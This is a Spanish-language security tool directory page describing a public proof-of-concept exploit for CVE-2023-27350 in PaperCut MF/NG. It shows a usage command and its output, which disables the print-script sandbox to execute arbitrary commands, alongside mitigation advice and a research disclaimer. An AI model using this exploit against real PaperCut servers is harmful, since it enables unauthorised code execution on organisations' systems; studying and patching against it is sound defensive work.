Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/royall-researchers/cve-2023-27350
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

Vulnerabilidad de Papercut, las versiones afectadas son PaperCut MF o NG versión 8.0 o posterior (excluyendo versiones parcheadas) en todas las plataformas de sistema operativo.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
4hace 1 añoAún no revisado

CVE-2023-27350

POC para CVE-2023-27350 que afecta a PaperCut MF/NG

##Versiones afectadas 'PaperCut MF o NG versión 8.0 o posterior (excluyendo versiones parcheadas) en todas las plataformas OS.'

Resumen

Este POC utiliza una vulnerabilidad de omisión de autenticación encadenada con el abuso de la funcionalidad de scripting incorporada para ejecutar código.

Uso

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones del Aviso de Seguridad de PaperCut

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

Descargo de responsabilidad

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables ni se hacen responsables del mal uso del software. Úselo de manera responsable.

Descargar herramienta